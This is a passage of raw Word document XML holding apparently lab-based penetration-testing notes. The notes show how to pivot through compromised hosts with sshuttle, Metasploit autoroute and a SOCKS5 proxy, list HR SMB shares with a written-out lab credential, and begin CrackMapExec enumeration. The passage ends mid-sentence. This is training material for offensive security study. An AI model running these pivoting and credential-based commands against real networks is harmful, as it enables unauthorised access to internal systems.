    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000939">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1120"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">We run this on CONFLUENCE01 (Jump1) and target PGDATABASE01 (Jump2) on port 22</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000093A">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Next, we can run </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sshuttle</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, specifying the SSH connection string we want to use, as well as the subnets that we want to tunnel through this connection (</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">10.4.50.0/24</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">172.16.50.0/24</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000093B">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000093C">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sshuttle -r database_admin@192.168.50.63:2222 10.4.50.0/24 172.16.50.0/24</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000093D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1148"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">We specify these two subnets (the DMZ and INTERNAL subnets)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000093E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1148"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">These are the destination networks that you want to access through the tunnel. You're saying:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000093F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1148"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">"Whenever I try to access anything in the 10.4.50.0/24 or 172.16.50.0/24 subnets, route that traffic through the SSH tunnel instead of my normal default route."</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000940">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1148"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Include all the subnets needed to get to the target subnet, which in this case is </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">10.4.50.0/24</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000941">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000942">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Although we don't receive much output from sshuttle, in theory, it should have set up the routing on our Kali machine so that any requests we make to hosts in the subnets we specified will be pushed transparently through the SSH connection. Let's test if this is working by trying to connect to the SMB share on HRSHARES in a new terminal.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000943">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000944">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">smbclient -L //172.16.50.217/ -U hr_admin --password=Welcome1234</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000945">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000946">
      <w:pPr>
        <w:spacing w:after="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Great! We're now connecting to HRSHARES transparently, as though we are on the same network and have direct access.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000947">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">In this section, we used sshuttle to create a VPN-like environment. We were then able to connect transparently to HRSHARES from our Kali machine, as though we were on the same network as PGDATABASE01.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000948">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000009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A">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_e78x9zxnt8r9" w:id="81"/>
      <w:bookmarkEnd w:id="81"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Port Forwarding with Windows Tools</w:t>
      </w:r>
    </w:p>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b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This is from </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">XXXXXXXXX 19.4. Port Forwarding with Windows Tools</w:t>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t xml:space="preserve">This includes:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000094F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="419"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ssh.exe</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000950">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="419"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Plink</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000951">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="419"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Netsh</w:t>
      </w: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pStyle w:val="Heading1"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_1driqwbpvfv8" w:id="82"/>
      <w:bookmarkEnd w:id="82"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Set up SOCKS5 Proxy to access internal network</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000957">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000958">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">More information about using SOCKS5 proxy can be found in the "</w:t>
      </w:r>
      <w:hyperlink w:anchor="_ry7a9yveemk4">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">Pivoting with Metasploit</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">"</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> sub-section, within the "Metasploit" section </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000959">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000095A">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">From XXXXXXXXX (27.4.2. Services and Sessions)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000095B">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000095C">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000095D">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000095E">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">We can use </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">multi/manage/autoroute</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">auxiliary/server/socks_proxy</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> to create a SOCKS5 proxy to access the internal network from our Kali box as we learned in the "The Metasploit Framework" Module.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000095F">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5133109" cy="3529013"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="155" name="image145.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image145.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId196"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5133109" cy="3529013"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000960">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="414"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">use multi/manage/autoroute</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000961">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="414"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">set session 1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000962">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="414"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">run</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000963">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="414"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">use auxiliary/server/socks_proxy</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000964">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="414"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">set SRVHOST 127.0.0.1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000965">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="414"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">set VERSION 5</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000966">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="414"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">run -j</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000967">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000968">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The SOCKS5 proxy is now active, and we can use </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">proxychains</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> to access the internal network. Let's confirm that </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/etc/proxychains4.conf</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> still contains the necessary settings from previous Modules. Meaning, only the SOCKS5 entry from the following listing should be active.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000969">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000096A">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="927100"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="560" name="image550.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image550.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId197"/>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96B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="197"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">cat /etc/proxychains4.conf</w:t>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t xml:space="preserve">Finally, we are set up to enumerate the network via Proxychains.</w:t>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t xml:space="preserve">Let's begin with CrackMapExec's SMB module to retrieve basic information of the identified servers (such as SMB settings). We'll also provide the credentials for </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">john</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
